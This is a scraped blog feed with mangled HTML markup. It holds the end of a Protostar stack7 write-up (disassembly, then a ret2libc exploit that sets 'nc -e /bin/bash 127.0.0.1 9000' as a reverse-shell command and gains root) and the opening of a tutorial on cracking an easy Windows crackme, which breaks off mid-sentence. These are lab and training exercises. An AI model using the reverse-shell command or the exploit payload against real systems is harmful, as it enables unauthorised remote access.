span class="code-line"span class="x" 80483e4:   ff 25 5c 97 04 08       jmp    DWORD PTR ds:0x804975c/span/span
span class="code-line"span class="x" 80483ea:   68 28 00 00 00          push   0x28/span/span
span class="code-line"span class="x" 80483ef:   e9 90 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"span class="mh"080483f4/span span class="p"lt;/spanspan class="nf"[email protected]/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80483f4:   ff 25 60 97 04 08       jmp    DWORD PTR ds:0x8049760/span/span
span class="code-line"span class="x" 80483fa:   68 30 00 00 00          push   0x30/span/span
span class="code-line"span class="x" 80483ff:   e9 80 ff ff ff          jmp    8048384 lt;_init+0x30gt;/span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".text/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048410/span span class="p"lt;/spanspan class="nf"_start/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048410:   31 ed                   xor    ebp,ebp/span/span
span class="code-line"span class="x" 8048412:   5e                      pop    esi/span/span
span class="code-line"span class="x" 8048413:   89 e1                   mov    ecx,esp/span/span
span class="code-line"span class="x" 8048415:   83 e4 f0                and    esp,0xfffffff0/span/span
span class="code-line"span class="x" 8048418:   50                      push   eax/span/span
span class="code-line"span class="x" 8048419:   54                      push   esp/span/span
span class="code-line"span class="x" 804841a:   52                      push   edx/span/span
span class="code-line"span class="x" 804841b:   68 60 85 04 08          push   0x8048560/span/span
span class="code-line"span class="x" 8048420:   68 70 85 04 08          push   0x8048570/span/span
span class="code-line"span class="x" 8048425:   51                      push   ecx/span/span
span class="code-line"span class="x" 8048426:   56                      push   esi/span/span
span class="code-line"span class="x" 8048427:   68 45 85 04 08          push   0x8048545/span/span
span class="code-line"span class="x" 804842c:   e8 83 ff ff ff          call   80483b4 lt;[email protected];/span/span
span class="code-line"span class="x" 8048431:   f4                      hlt    /span/span
span class="code-line"span class="x" 8048432:   90                      nop/span/span
span class="code-line"span class="x" 8048433:   90                      nop/span/span
span class="code-line"span class="x" 8048434:   90                      nop/span/span
span class="code-line"span class="x" 8048435:   90                      nop/span/span
span class="code-line"span class="x" 8048436:   90                      nop/span/span
span class="code-line"span class="x" 8048437:   90                      nop/span/span
span class="code-line"span class="x" 8048438:   90                      nop/span/span
span class="code-line"span class="x" 8048439:   90                      nop/span/span
span class="code-line"span class="x" 804843a:   90                      nop/span/span
span class="code-line"span class="x" 804843b:   90                      nop/span/span
span class="code-line"span class="x" 804843c:   90                      nop/span/span
span class="code-line"span class="x" 804843d:   90                      nop/span/span
span class="code-line"span class="x" 804843e:   90                      nop/span/span
span class="code-line"span class="x" 804843f:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048440/span span class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048440:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048441:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048443:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048444:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 8048447:   80 3d 84 97 04 08 00    cmp    BYTE PTR ds:0x8049784,0x0/span/span
span class="code-line"span class="x" 804844e:   75 3f                   jne    804848f lt;__do_global_dtors_aux+0x4fgt;/span/span
span class="code-line"span class="x" 8048450:   a1 88 97 04 08          mov    eax,ds:0x8049788/span/span
span class="code-line"span class="x" 8048455:   bb 60 96 04 08          mov    ebx,0x8049660/span/span
span class="code-line"span class="x" 804845a:   81 eb 5c 96 04 08       sub    ebx,0x804965c/span/span
span class="code-line"span class="x" 8048460:   c1 fb 02                sar    ebx,0x2/span/span
span class="code-line"span class="x" 8048463:   83 eb 01                sub    ebx,0x1/span/span
span class="code-line"span class="x" 8048466:   39 d8                   cmp    eax,ebx/span/span
span class="code-line"span class="x" 8048468:   73 1e                   jae    8048488 lt;__do_global_dtors_aux+0x48gt;/span/span
span class="code-line"span class="x" 804846a:   8d b6 00 00 00 00       lea    esi,[esi+0x0]/span/span
span class="code-line"span class="x" 8048470:   83 c0 01                add    eax,0x1/span/span
span class="code-line"span class="x" 8048473:   a3 88 97 04 08          mov    ds:0x8049788,eax/span/span
span class="code-line"span class="x" 8048478:   ff 14 85 5c 96 04 08    call   DWORD PTR [eax*4+0x804965c]/span/span
span class="code-line"span class="x" 804847f:   a1 88 97 04 08          mov    eax,ds:0x8049788/span/span
span class="code-line"span class="x" 8048484:   39 d8                   cmp    eax,ebx/span/span
span class="code-line"span class="x" 8048486:   72 e8                   jb     8048470 lt;__do_global_dtors_aux+0x30gt;/span/span
span class="code-line"span class="x" 8048488:   c6 05 84 97 04 08 01    mov    BYTE PTR ds:0x8049784,0x1/span/span
span class="code-line"span class="x" 804848f:   83 c4 04                add    esp,0x4/span/span
span class="code-line"span class="x" 8048492:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048493:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048494:   c3                      ret    /span/span
span class="code-line"span class="x" 8048495:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]/span/span
span class="code-line"span class="x" 8048499:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]/span/span
span class="code-line"/span
span class="code-line"span class="mh"080484a0/span span class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80484a0:   55                      push   ebp/span/span
span class="code-line"span class="x" 80484a1:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80484a3:   83 ec 18                sub    esp,0x18/span/span
span class="code-line"span class="x" 80484a6:   a1 64 96 04 08          mov    eax,ds:0x8049664/span/span
span class="code-line"span class="x" 80484ab:   85 c0                   test   eax,eax/span/span
span class="code-line"span class="x" 80484ad:   74 12                   je     80484c1 lt;frame_dummy+0x21gt;/span/span
span class="code-line"span class="x" 80484af:   b8 00 00 00 00          mov    eax,0x0/span/span
span class="code-line"span class="x" 80484b4:   85 c0                   test   eax,eax/span/span
span class="code-line"span class="x" 80484b6:   74 09                   je     80484c1 lt;frame_dummy+0x21gt;/span/span
span class="code-line"span class="x" 80484b8:   c7 04 24 64 96 04 08    mov    DWORD PTR [esp],0x8049664/span/span
span class="code-line"span class="x" 80484bf:   ff d0                   call   eax/span/span
span class="code-line"span class="x" 80484c1:   c9                      leave  /span/span
span class="code-line"span class="x" 80484c2:   c3                      ret    /span/span
span class="code-line"span class="x" 80484c3:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"080484c4/span span class="p"lt;/spanspan class="nf"getpath/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80484c4:   55                      push   ebp/span/span
span class="code-line"span class="x" 80484c5:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80484c7:   83 ec 68                sub    esp,0x68/span/span
span class="code-line"span class="x" 80484ca:   b8 20 86 04 08          mov    eax,0x8048620/span/span
span class="code-line"span class="x" 80484cf:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484d2:   e8 0d ff ff ff          call   80483e4 lt;[email protected];/span/span
span class="code-line"span class="x" 80484d7:   a1 80 97 04 08          mov    eax,ds:0x8049780/span/span
span class="code-line"span class="x" 80484dc:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484df:   e8 f0 fe ff ff          call   80483d4 lt;[email protected];/span/span
span class="code-line"span class="x" 80484e4:   8d 45 b4                lea    eax,[ebp-0x4c]/span/span
span class="code-line"span class="x" 80484e7:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80484ea:   e8 b5 fe ff ff          call   80483a4 lt;[email protected];/span/span
span class="code-line"span class="x" 80484ef:   8b 45 04                mov    eax,DWORD PTR [ebp+0x4]/span/span
span class="code-line"span class="x" 80484f2:   89 45 f4                mov    DWORD PTR [ebp-0xc],eax/span/span
span class="code-line"span class="x" 80484f5:   8b 45 f4                mov    eax,DWORD PTR [ebp-0xc]/span/span
span class="code-line"span class="x" 80484f8:   25 00 00 00 b0          and    eax,0xb0000000/span/span
span class="code-line"span class="x" 80484fd:   3d 00 00 00 b0          cmp    eax,0xb0000000/span/span
span class="code-line"span class="x" 8048502:   75 20                   jne    8048524 lt;getpath+0x60gt;/span/span
span class="code-line"span class="x" 8048504:   b8 34 86 04 08          mov    eax,0x8048634/span/span
span class="code-line"span class="x" 8048509:   8b 55 f4                mov    edx,DWORD PTR [ebp-0xc]/span/span
span class="code-line"span class="x" 804850c:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx/span/span
span class="code-line"span class="x" 8048510:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 8048513:   e8 cc fe ff ff          call   80483e4 lt;[email protected];/span/span
span class="code-line"span class="x" 8048518:   c7 04 24 01 00 00 00    mov    DWORD PTR [esp],0x1/span/span
span class="code-line"span class="x" 804851f:   e8 a0 fe ff ff          call   80483c4 lt;[email protected];/span/span
span class="code-line"span class="x" 8048524:   b8 40 86 04 08          mov    eax,0x8048640/span/span
span class="code-line"span class="x" 8048529:   8d 55 b4                lea    edx,[ebp-0x4c]/span/span
span class="code-line"span class="x" 804852c:   89 54 24 04             mov    DWORD PTR [esp+0x4],edx/span/span
span class="code-line"span class="x" 8048530:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 8048533:   e8 ac fe ff ff          call   80483e4 lt;[email protected];/span/span
span class="code-line"span class="x" 8048538:   8d 45 b4                lea    eax,[ebp-0x4c]/span/span
span class="code-line"span class="x" 804853b:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 804853e:   e8 b1 fe ff ff          call   80483f4 lt;[email protected];/span/span
span class="code-line"span class="x" 8048543:   c9                      leave  /span/span
span class="code-line"span class="x" 8048544:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"span class="mh"08048545/span span class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048545:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048546:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048548:   83 e4 f0                and    esp,0xfffffff0/span/span
span class="code-line"span class="x" 804854b:   e8 74 ff ff ff          call   80484c4 lt;getpathgt;/span/span
span class="code-line"span class="x" 8048550:   89 ec                   mov    esp,ebp/span/span
span class="code-line"span class="x" 8048552:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048553:   c3                      ret    /span/span
span class="code-line"span class="x" 8048554:   90                      nop/span/span
span class="code-line"span class="x" 8048555:   90                      nop/span/span
span class="code-line"span class="x" 8048556:   90                      nop/span/span
span class="code-line"span class="x" 8048557:   90                      nop/span/span
span class="code-line"span class="x" 8048558:   90                      nop/span/span
span class="code-line"span class="x" 8048559:   90                      nop/span/span
span class="code-line"span class="x" 804855a:   90                      nop/span/span
span class="code-line"span class="x" 804855b:   90                      nop/span/span
span class="code-line"span class="x" 804855c:   90                      nop/span/span
span class="code-line"span class="x" 804855d:   90                      nop/span/span
span class="code-line"span class="x" 804855e:   90                      nop/span/span
span class="code-line"span class="x" 804855f:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048560/span span class="p"lt;/spanspan class="nf"__libc_csu_fini/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048560:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048561:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048563:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 8048564:   c3                      ret    /span/span
span class="code-line"span class="x" 8048565:   8d 74 26 00             lea    esi,[esi+eiz*1+0x0]/span/span
span class="code-line"span class="x" 8048569:   8d bc 27 00 00 00 00    lea    edi,[edi+eiz*1+0x0]/span/span
span class="code-line"/span
span class="code-line"span class="mh"08048570/span span class="p"lt;/spanspan class="nf"__libc_csu_init/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 8048570:   55                      push   ebp/span/span
span class="code-line"span class="x" 8048571:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 8048573:   57                      push   edi/span/span
span class="code-line"span class="x" 8048574:   56                      push   esi/span/span
span class="code-line"span class="x" 8048575:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048576:   e8 4f 00 00 00          call   80485ca lt;__i686.get_pc_thunk.bxgt;/span/span
span class="code-line"span class="x" 804857b:   81 c3 c1 11 00 00       add    ebx,0x11c1/span/span
span class="code-line"span class="x" 8048581:   83 ec 1c                sub    esp,0x1c/span/span
span class="code-line"span class="x" 8048584:   e8 cb fd ff ff          call   8048354 lt;_initgt;/span/span
span class="code-line"span class="x" 8048589:   8d bb 18 ff ff ff       lea    edi,[ebx-0xe8]/span/span
span class="code-line"span class="x" 804858f:   8d 83 18 ff ff ff       lea    eax,[ebx-0xe8]/span/span
span class="code-line"span class="x" 8048595:   29 c7                   sub    edi,eax/span/span
span class="code-line"span class="x" 8048597:   c1 ff 02                sar    edi,0x2/span/span
span class="code-line"span class="x" 804859a:   85 ff                   test   edi,edi/span/span
span class="code-line"span class="x" 804859c:   74 24                   je     80485c2 lt;__libc_csu_init+0x52gt;/span/span
span class="code-line"span class="x" 804859e:   31 f6                   xor    esi,esi/span/span
span class="code-line"span class="x" 80485a0:   8b 45 10                mov    eax,DWORD PTR [ebp+0x10]/span/span
span class="code-line"span class="x" 80485a3:   89 44 24 08             mov    DWORD PTR [esp+0x8],eax/span/span
span class="code-line"span class="x" 80485a7:   8b 45 0c                mov    eax,DWORD PTR [ebp+0xc]/span/span
span class="code-line"span class="x" 80485aa:   89 44 24 04             mov    DWORD PTR [esp+0x4],eax/span/span
span class="code-line"span class="x" 80485ae:   8b 45 08                mov    eax,DWORD PTR [ebp+0x8]/span/span
span class="code-line"span class="x" 80485b1:   89 04 24                mov    DWORD PTR [esp],eax/span/span
span class="code-line"span class="x" 80485b4:   ff 94 b3 18 ff ff ff    call   DWORD PTR [ebx+esi*4-0xe8]/span/span
span class="code-line"span class="x" 80485bb:   83 c6 01                add    esi,0x1/span/span
span class="code-line"span class="x" 80485be:   39 fe                   cmp    esi,edi/span/span
span class="code-line"span class="x" 80485c0:   72 de                   jb     80485a0 lt;__libc_csu_init+0x30gt;/span/span
span class="code-line"span class="x" 80485c2:   83 c4 1c                add    esp,0x1c/span/span
span class="code-line"span class="x" 80485c5:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 80485c6:   5e                      pop    esi/span/span
span class="code-line"span class="x" 80485c7:   5f                      pop    edi/span/span
span class="code-line"span class="x" 80485c8:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 80485c9:   c3                      ret    /span/span
span class="code-line"/span
span class="code-line"span class="mh"080485ca/span span class="p"lt;/spanspan class="nf"__i686.get_pc_thunk.bx/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485ca:   8b 1c 24                mov    ebx,DWORD PTR [esp]/span/span
span class="code-line"span class="x" 80485cd:   c3                      ret    /span/span
span class="code-line"span class="x" 80485ce:   90                      nop/span/span
span class="code-line"span class="x" 80485cf:   90                      nop/span/span
span class="code-line"/span
span class="code-line"span class="mh"080485d0/span span class="p"lt;/spanspan class="nf"__do_global_ctors_aux/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485d0:   55                      push   ebp/span/span
span class="code-line"span class="x" 80485d1:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80485d3:   53                      push   ebx/span/span
span class="code-line"span class="x" 80485d4:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 80485d7:   a1 54 96 04 08          mov    eax,ds:0x8049654/span/span
span class="code-line"span class="x" 80485dc:   83 f8 ff                cmp    eax,0xffffffff/span/span
span class="code-line"span class="x" 80485df:   74 13                   je     80485f4 lt;__do_global_ctors_aux+0x24gt;/span/span
span class="code-line"span class="x" 80485e1:   bb 54 96 04 08          mov    ebx,0x8049654/span/span
span class="code-line"span class="x" 80485e6:   66 90                   xchg   ax,ax/span/span
span class="code-line"span class="x" 80485e8:   83 eb 04                sub    ebx,0x4/span/span
span class="code-line"span class="x" 80485eb:   ff d0                   call   eax/span/span
span class="code-line"span class="x" 80485ed:   8b 03                   mov    eax,DWORD PTR [ebx]/span/span
span class="code-line"span class="x" 80485ef:   83 f8 ff                cmp    eax,0xffffffff/span/span
span class="code-line"span class="x" 80485f2:   75 f4                   jne    80485e8 lt;__do_global_ctors_aux+0x18gt;/span/span
span class="code-line"span class="x" 80485f4:   83 c4 04                add    esp,0x4/span/span
span class="code-line"span class="x" 80485f7:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 80485f8:   5d                      pop    ebp/span/span
span class="code-line"span class="x" 80485f9:   c3                      ret    /span/span
span class="code-line"span class="x" 80485fa:   90                      nop/span/span
span class="code-line"span class="x" 80485fb:   90                      nop/span/span
span class="code-line"/span
span class="code-line"Disassembly of section span class="nl".fini/spanspan class="p":/span/span
span class="code-line"/span
span class="code-line"span class="mh"080485fc/span span class="p"lt;/spanspan class="nf"_fini/spanspan class="p"gt;:/span/span
span class="code-line"span class="x" 80485fc:   55                      push   ebp/span/span
span class="code-line"span class="x" 80485fd:   89 e5                   mov    ebp,esp/span/span
span class="code-line"span class="x" 80485ff:   53                      push   ebx/span/span
span class="code-line"span class="x" 8048600:   83 ec 04                sub    esp,0x4/span/span
span class="code-line"span class="x" 8048603:   e8 00 00 00 00          call   8048608 lt;_fini+0xcgt;/span/span
span class="code-line"span class="x" 8048608:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048609:   81 c3 34 11 00 00       add    ebx,0x1134/span/span
span class="code-line"span class="x" 804860f:   e8 2c fe ff ff          call   8048440 lt;__do_global_dtors_auxgt;/span/span
span class="code-line"span class="x" 8048614:   59                      pop    ecx/span/span
span class="code-line"span class="x" 8048615:   5b                      pop    ebx/span/span
span class="code-line"span class="x" 8048616:   c9                      leave  /span/span
span class="code-line"span class="x" 8048617:   c3                      ret/span/span
span class="code-line"/code/pre/div
/td/tr/table
pOK, so the codepop, ret/code starts at code0x80485f8/code and the coderet/code is at code0x80485f9/code./p
pNow we just need to create the environment variable and find it in memory:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/opt/protostar/bin$ /spanspan class="nb"export/span span class="nv"NCCMD/spanspan class="o"=/spanspan class="s2"quot;nc -e /bin/bash 127.0.0.1 9000quot;/span/span
span class="code-line"/code/pre/div
/td/tr/table
pTo find out where it will be in memory I'm going to use the same a href="/assets/code/x86-32-linux/getenvaddr.c"C application/a that I've used before, which uses codegetenv/code to work it out:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/span
span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/opt/protostar/bin$ /spangcc -o /tmp/env /tmp/env.c/span
span class="code-line"span class="gp"[email protected]:/opt/protostar/bin$ /span/tmp/env/span
span class="code-line"span class="go"Usage: /tmp/env lt;environment variablegt; lt;target program namegt;/span/span
span class="code-line"span class="gp"[email protected]:/opt/protostar/bin$ /span/tmp/env NCCMD ./stack7/span
span class="code-line"span class="go"NCCMD will be at 0xbfffff6e/span/span
span class="code-line"/code/pre/div
/td/tr/table
pWe know that the distance from the start of the payload to overwriting the return address will be the same as before because the application is identical in that sense./p
pNow we have all of the information to exploit it:/p
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannc -l -p span class="m"9000/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/opt/protostar/bin$ /spanpython -c span class="s1"#39;print quot;Aquot;*80 + quot;\xf9\x85\x04\x08quot; + quot;\x80\xec\xf2\xb7quot; + quot;\xf8\x85\x04\x08quot; + quot;\x00\x00\x00\x00quot; + quot;\xb0\xff\xec\xb7quot; + quot;JUNKquot; + quot;\x6e\xff\xff\xbfquot;#39;/span span class="p"|/span ./stack7/span
span class="code-line"span class="go"input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��������/span/span
span class="code-line"/code/pre/div
/td/tr/table
table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span
span class="code-line"span class="normal"2/span/span
span class="code-line"span class="normal"3/span/span
span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"pwd/span/span
span class="code-line"span class="go"/opt/protostar/bin/span/span
span class="code-line"span class="go"whoami/span/span
span class="code-line"span class="go"root/span/span
span class="code-line"/code/pre/div
/td/tr/table
pPWNED! :-)/p
h2Conclusion/h2
pThere are normally a number of ways to exploit a single vulnerablity so while you are learning it is best to try to exploit it in as many ways as possible because some might work in some situations while others might not./p
pRet2Libc is very powerful and beats NX completely but ROP is even more powerful and providing there are enough different ROP gadgets, you can create the whole shellcode using nothing but ROP gadgets but this requires the application to be quite big./p
h2Further Reading/h2
pFor more indepth information about Ret2Libc see a href="http://phrack.org/issues/58/4.html" target="_blank"this/a article on phrack./p
pRead emHacking: The Art Of Exploitation/em by emJon Erickson/em for more information about all of the attacks I've discussed so far and more./p
✇eXploit

An Easy Windows Crackme

By: 0xe7
pHere I'm going to show you how to crack a href="http://crackmes.de/users/san01suke/somecrypto01/" target="_blank"this/a crackme. We'll use some basic reversing techniques to figure out how it works and how to break or bypass its copy protection./p pSome knowledge of IA-32 assembly would be beneficial to understand what is going on but I'll try to explain it in enough detail that you should be able to follow anyway./p !-- more -- h2Prerequisites/h2 pIf you want to follow along the setup is:/p ul li32bit Windows 7 Home Edition installed inside a VMware virtual machine/li lia href="http://www.ollydbg.de/" target="_blank"OllyDBG/a installed/li lia href="https://www.microsoft.com/en-gb/download/details.aspx?id=40787" target="_blank"Microsoft Visual Studio Express 2013 for Windows Desktop/a installed and 'VC/bin/' in the PATH variable/li /ul h2Initial Look/h2 pAfter you download the zip file and look inside it you should seee this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/zip-file.png"/p pDrag the folder they are sitting in to the desktop and run codeSomeCrypto~01.exe/code by double clicking on it./p pYou should see a rather intimidating window with no explaination like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/somecrypto1-run.png"/p pTry to put some junk input in the 2 fields but nothing happens:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/somecrypto1-input.png"/p pLet's close this, it tells us nothing, and have a closer look at the binary itself./p pOne of the first things you should always look at is the strongimports/strong section of the binary, it tells you what functions are being imported by the application from other libraries (a href="http://support.microsoft.com/kb/815065" target="_blank".dll files/a)./p pThis tells you a lot about the application and there are nearly always imports because the application has to communicate with the OS./p pcodedumpbin/code is an application that comes with codeMicrosoft Visual Studio Express 2013 for Windows Desktop/code and on my test machine resides in codeC:\Program Files\Microsoft Visual Studio 12\VC\bin\/code./p pIt can be used to look at some of the sections in a href="https://en.wikipedia.org/wiki/Portable_Executable" target="_blank"PE executables/a./p pOpen up a command prompt with admin privileges:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/admin-cmd.png" width="800"/p pAnd run the command codedumpbin /imports "C:\Users\user\Desktop\SomeCrypto~01\SomeCrypto~01.exe"/code./p pThe location of the crackme file might be different depending on what your local username is for Windows (mine is codeuser/code) and if you extracted it to somewhere other than the desktop./p pYou should see an output like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Microsoft (R) COFF/PE Dumper Version 12.00.21005.1/span/span span class="code-line"span class="go"Copyright (C) Microsoft Corporation. All rights reserved./span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="go"Dump of file C:\Users\user\Desktop\SomeCrypto~01\SomeCrypto~01.exe/span/span span class="code-line"/span span class="code-line"span class="go"File Type: EXECUTABLE IMAGE/span/span span class="code-line"/span span class="code-line"span class="go" Section contains the following imports:/span/span span class="code-line"/span span class="code-line"span class="go" KERNEL32.dll/span/span span class="code-line"span class="go" 402018 Import Address Table/span/span span class="code-line"span class="go" 4024F4 Import Name Table/span/span span class="code-line"span class="go" 0 time date stamp/span/span span class="code-line"span class="go" 0 Index of first forwarder reference/span/span span class="code-line"/span span class="code-line"span class="go" 215 GetModuleHandleA/span/span span class="code-line"/span span class="code-line"span class="go" USER32.dll/span/span span class="code-line"span class="go" 402020 Import Address Table/span/span span class="code-line"span class="go" 4024FC Import Name Table/span/span span class="code-line"span class="go" 0 time date stamp/span/span span class="code-line"span class="go" 0 Index of first forwarder reference/span/span span class="code-line"/span span class="code-line"span class="go" 20E MessageBoxA/span/span span class="code-line"span class="go" 121 GetDC/span/span span class="code-line"span class="go" 265 ReleaseDC/span/span span class="code-line"span class="go" 114 GetClientRect/span/span span class="code-line"span class="go" 2BB SetTimer/span/span span class="code-line"span class="go" DC EndPaint/span/span span class="code-line"span class="go" DA EndDialog/span/span span class="code-line"span class="go" 1EE LoadImageA/span/span span class="code-line"span class="go" 129 GetDlgItemTextA/span/span span class="code-line"span class="go" AB DialogBoxParamA/span/span span class="code-line"span class="go" 28F SetDlgItemTextA/span/span span class="code-line"span class="go" E BeginPaint/span/span span class="code-line"/span span class="code-line"span class="go" GDI32.dll/span/span span class="code-line"span class="go" 402000 Import Address Table/span/span span class="code-line"span class="go" 4024DC Import Name Table/span/span span class="code-line"span class="go" 0 time date stamp/span/span span class="code-line"span class="go" 0 Index of first forwarder reference/span/span span class="code-line"/span span class="code-line"span class="go" 1FB GetObjectA/span/span span class="code-line"span class="go" 13 BitBlt/span/span span class="code-line"span class="go" E6 DeleteObject/span/span span class="code-line"span class="go" 277 SelectObject/span/span span class="code-line"span class="go" 30 CreateCompatibleDC/span/span span class="code-line"/span span class="code-line"span class="go" Summary/span/span span class="code-line"/span span class="code-line"span class="go" 1000 .data/span/span span class="code-line"span class="go" 1000 .rdata/span/span span class="code-line"span class="go" 69000 .rsrc/span/span span class="code-line"span class="go" 1000 .text/span/span span class="code-line"/code/pre/div /td/tr/table pThis shows us the functions that are being imported and which dll file each function is in./p pThe first thing that stands out to me is the call to codeMessageBoxA/code on line 25./p pThese challenges normally create a message box saying "Success" or something when you have done it so a call to this might be where in the application we want to get to./p pAnd once we are there we should be able to trace back through the code to see where the check was done./p pThe second thing I notice is the call to codeGetDlgItemTextA/code on line 33./p pThis function looks like it could be responsible for getting our input, if this is true we could follow the code from that point and find the code that checks our input and the success code./p h2Digging A Little Deeper/h2 pWe can ignore the rest for now and go straight to opening the application in OllyDBG. Open Olly with administrator privileges:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-admin.png" width="800"/p pClick emFile-gt;Open/em and choose the codeSomeCrypto~01.exe/code file:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/open-crackme-olly.png" width="800"/p pYou should then see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-open.png" width="800"/p pThe big section in the top left is the main disassembly window, this shows the disassembly of the application from the a href="https://en.wikipedia.org/wiki/Entry_point" 